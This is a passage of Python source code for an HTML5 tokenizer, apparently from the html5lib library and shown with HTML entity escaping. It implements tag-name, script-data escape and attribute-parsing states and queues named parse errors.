            self.state = self.tagNameState
        elif data == &quot;&gt;&quot;:
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name-but-got-right-bracket&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&gt;&quot;})
            self.state = self.dataState
        elif data == &quot;?&quot;:
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name-but-got-question-mark&quot;})
            self.stream.unget(data)
            self.state = self.bogusCommentState
        else:
            # XXX
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-tag-name&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.dataState
        return True

    def closeTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;], &quot;name&quot;: data,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.tagNameState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-right-bracket&quot;})
            self.state = self.dataState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-eof&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.state = self.dataState
        else:
            # XXX data can be _&#039;_...
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-closing-tag-but-got-char&quot;,
                                    &quot;datavars&quot;: {&quot;data&quot;: data}})
            self.stream.unget(data)
            self.state = self.bogusCommentState
        return True

    def tagNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-tag-name&quot;})
            self.state = self.dataState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;name&quot;] += &quot;\uFFFD&quot;
        else:
            self.currentToken[&quot;name&quot;] += data
            # (Don&#039;t use charsUntil here, because tag names are
            # very short and it&#039;s faster to not do anything fancy)
        return True

    def rcdataLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.rcdataEndTagOpenState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rcdataEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.rcdataEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rcdataEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.rcdataState
        return True

    def rawtextLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.rawtextEndTagOpenState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def rawtextEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.rawtextEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def rawtextEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.rawtextState
        return True

    def scriptDataLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataEndTagOpenState
        elif data == &quot;!&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;!&quot;})
            self.state = self.scriptDataEscapeStartState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer += data
            self.state = self.scriptDataEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapeStartState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapeStartDashState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapeStartDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashDashState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataState
        return True

    def scriptDataEscapedState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashState
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            self.state = self.dataState
        else:
            chars = self.stream.charsUntil((&quot;&lt;&quot;, &quot;-&quot;, &quot;\u0000&quot;))
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;:
                                    data + chars})
        return True

    def scriptDataEscapedDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataEscapedDashDashState
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataEscapedState
        elif data == EOF:
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedDashDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
        elif data == &quot;&lt;&quot;:
            self.state = self.scriptDataEscapedLessThanSignState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&gt;&quot;})
            self.state = self.scriptDataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataEscapedState
        elif data == EOF:
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataEscapedEndTagOpenState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot; + data})
            self.temporaryBuffer = data
            self.state = self.scriptDataDoubleEscapeStartState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedEndTagOpenState(self):
        data = self.stream.char()
        if data in asciiLetters:
            self.temporaryBuffer = data
            self.state = self.scriptDataEscapedEndTagNameState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;/&quot;})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataEscapedEndTagNameState(self):
        appropriate = self.currentToken and self.currentToken[&quot;name&quot;].lower() == self.temporaryBuffer.lower()
        data = self.stream.char()
        if data in spaceCharacters and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.beforeAttributeNameState
        elif data == &quot;/&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.state = self.selfClosingStartTagState
        elif data == &quot;&gt;&quot; and appropriate:
            self.currentToken = {&quot;type&quot;: tokenTypes[&quot;EndTag&quot;],
                                 &quot;name&quot;: self.temporaryBuffer,
                                 &quot;data&quot;: [], &quot;selfClosing&quot;: False}
            self.emitCurrentToken()
            self.state = self.dataState
        elif data in asciiLetters:
            self.temporaryBuffer += data
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;&lt;/&quot; + self.temporaryBuffer})
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataDoubleEscapeStartState(self):
        data = self.stream.char()
        if data in (spaceCharacters | frozenset((&quot;/&quot;, &quot;&gt;&quot;))):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            if self.temporaryBuffer.lower() == &quot;script&quot;:
                self.state = self.scriptDataDoubleEscapedState
            else:
                self.state = self.scriptDataEscapedState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.temporaryBuffer += data
        else:
            self.stream.unget(data)
            self.state = self.scriptDataEscapedState
        return True

    def scriptDataDoubleEscapedState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataDoubleEscapedDashState
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
        return True

    def scriptDataDoubleEscapedDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
            self.state = self.scriptDataDoubleEscapedDashDashState
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataDoubleEscapedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapedDashDashState(self):
        data = self.stream.char()
        if data == &quot;-&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;-&quot;})
        elif data == &quot;&lt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&lt;&quot;})
            self.state = self.scriptDataDoubleEscapedLessThanSignState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;&gt;&quot;})
            self.state = self.scriptDataState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;],
                                    &quot;data&quot;: &quot;\uFFFD&quot;})
            self.state = self.scriptDataDoubleEscapedState
        elif data == EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-script-in-script&quot;})
            self.state = self.dataState
        else:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapedLessThanSignState(self):
        data = self.stream.char()
        if data == &quot;/&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: &quot;/&quot;})
            self.temporaryBuffer = &quot;&quot;
            self.state = self.scriptDataDoubleEscapeEndState
        else:
            self.stream.unget(data)
            self.state = self.scriptDataDoubleEscapedState
        return True

    def scriptDataDoubleEscapeEndState(self):
        data = self.stream.char()
        if data in (spaceCharacters | frozenset((&quot;/&quot;, &quot;&gt;&quot;))):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            if self.temporaryBuffer.lower() == &quot;script&quot;:
                self.state = self.scriptDataEscapedState
            else:
                self.state = self.scriptDataDoubleEscapedState
        elif data in asciiLetters:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;Characters&quot;], &quot;data&quot;: data})
            self.temporaryBuffer += data
        else:
            self.stream.unget(data)
            self.state = self.scriptDataDoubleEscapedState
        return True

    def beforeAttributeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data in asciiLetters:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;=&quot;, &quot;&lt;&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;invalid-character-in-attribute-name&quot;})
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;].append([&quot;\uFFFD&quot;, &quot;&quot;])
            self.state = self.attributeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-name-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        return True

    def attributeNameState(self):
        # Extends the name of the newest attribute on self.currentToken, or
        # ends the name and moves on. Always returns True.
        data = self.stream.char()
        # leavingThisState stays True unless the character was added to the
        # name; emitToken postpones emitCurrentToken until the name has been
        # normalised below.
        leavingThisState = True
        emitToken = False
        if data == &quot;=&quot;:
            self.state = self.beforeAttributeValueState
        elif data in asciiLetters:
            # Append the letter plus whatever charsUntil returns (with the
            # True flag presumably the following run of ASCII letters;
            # confirm against the stream class).
            self.currentToken[&quot;data&quot;][-1][0] += data +\
                self.stream.charsUntil(asciiLetters, True)
            leavingThisState = False
        elif data == &quot;&gt;&quot;:
            # XXX If we emit here the attributes are converted to a dict
            # without being checked and when the code below runs we error
            # because data is a dict not a list
            emitToken = True
        elif data in spaceCharacters:
            self.state = self.afterAttributeNameState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            # NUL is reported and U+FFFD is added to the name instead.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][0] += &quot;\uFFFD&quot;
            leavingThisState = False
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;&lt;&quot;):
            # Reported as an error, yet still added to the name.
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;:
                                    &quot;invalid-character-in-attribute-name&quot;})
            self.currentToken[&quot;data&quot;][-1][0] += data
            leavingThisState = False
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;eof-in-attribute-name&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][0] += data
            leavingThisState = False

        if leavingThisState:
            # Attributes are not dropped at this stage. That happens when the
            # start tag token is emitted so values can still be safely appended
            # to attributes, but we do want to report the parse error in time.
            # The finished name is mapped through asciiUpper2Lower first
            # (by its name an upper-to-lower case table) so the duplicate
            # check below compares normalised names.
            self.currentToken[&quot;data&quot;][-1][0] = (
                self.currentToken[&quot;data&quot;][-1][0].translate(asciiUpper2Lower))
            # Compare against every earlier attribute; a single error is
            # queued for the first match.
            for name, _ in self.currentToken[&quot;data&quot;][:-1]:
                if self.currentToken[&quot;data&quot;][-1][0] == name:
                    self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                            &quot;duplicate-attribute&quot;})
                    break
            # XXX Fix for above XXX
            if emitToken:
                self.emitCurrentToken()
        return True

    def afterAttributeNameState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data == &quot;=&quot;:
            self.state = self.beforeAttributeValueState
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data in asciiLetters:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data == &quot;/&quot;:
            self.state = self.selfClosingStartTagState
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;].append([&quot;\uFFFD&quot;, &quot;&quot;])
            self.state = self.attributeNameState
        elif data in (&quot;&#039;&quot;, &#039;&quot;&#039;, &quot;&lt;&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;invalid-character-after-attribute-name&quot;})
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-end-of-tag-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;].append([data, &quot;&quot;])
            self.state = self.attributeNameState
        return True

    def beforeAttributeValueState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.stream.charsUntil(spaceCharacters, True)
        elif data == &quot;\&quot;&quot;:
            self.state = self.attributeValueDoubleQuotedState
        elif data == &quot;&amp;&quot;:
            self.state = self.attributeValueUnQuotedState
            self.stream.unget(data)
        elif data == &quot;&#039;&quot;:
            self.state = self.attributeValueSingleQuotedState
        elif data == &quot;&gt;&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-value-but-got-right-bracket&quot;})
            self.emitCurrentToken()
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
            self.state = self.attributeValueUnQuotedState
        elif data in (&quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;equals-in-unquoted-attribute-value&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += data
            self.state = self.attributeValueUnQuotedState
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;expected-attribute-value-but-got-eof&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data
            self.state = self.attributeValueUnQuotedState
        return True

    def attributeValueDoubleQuotedState(self):
        data = self.stream.char()
        if data == &quot;\&quot;&quot;:
            self.state = self.afterAttributeValueState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&#039;&quot;&#039;)
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-double-quote&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data +\
                self.stream.charsUntil((&quot;\&quot;&quot;, &quot;&amp;&quot;, &quot;\u0000&quot;))
        return True

    def attributeValueSingleQuotedState(self):
        data = self.stream.char()
        if data == &quot;&#039;&quot;:
            self.state = self.afterAttributeValueState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&quot;&#039;&quot;)
        elif data == &quot;\u0000&quot;:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;],
                                    &quot;data&quot;: &quot;invalid-codepoint&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += &quot;\uFFFD&quot;
        elif data is EOF:
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;eof-in-attribute-value-single-quote&quot;})
            self.state = self.dataState
        else:
            self.currentToken[&quot;data&quot;][-1][1] += data +\
                self.stream.charsUntil((&quot;&#039;&quot;, &quot;&amp;&quot;, &quot;\u0000&quot;))
        return True

    def attributeValueUnQuotedState(self):
        data = self.stream.char()
        if data in spaceCharacters:
            self.state = self.beforeAttributeNameState
        elif data == &quot;&amp;&quot;:
            self.processEntityInAttribute(&quot;&gt;&quot;)
        elif data == &quot;&gt;&quot;:
            self.emitCurrentToken()
        elif data in (&#039;&quot;&#039;, &quot;&#039;&quot;, &quot;=&quot;, &quot;&lt;&quot;, &quot;`&quot;):
            self.tokenQueue.append({&quot;type&quot;: tokenTypes[&quot;ParseError&quot;], &quot;data&quot;:
                                    &quot;unexpected-character-in-unquoted-attribute-value&quot;})
            self.currentToken[&quot;data&quot;][-1][1] += data
        elif data == &quot;\u0000&quot;:
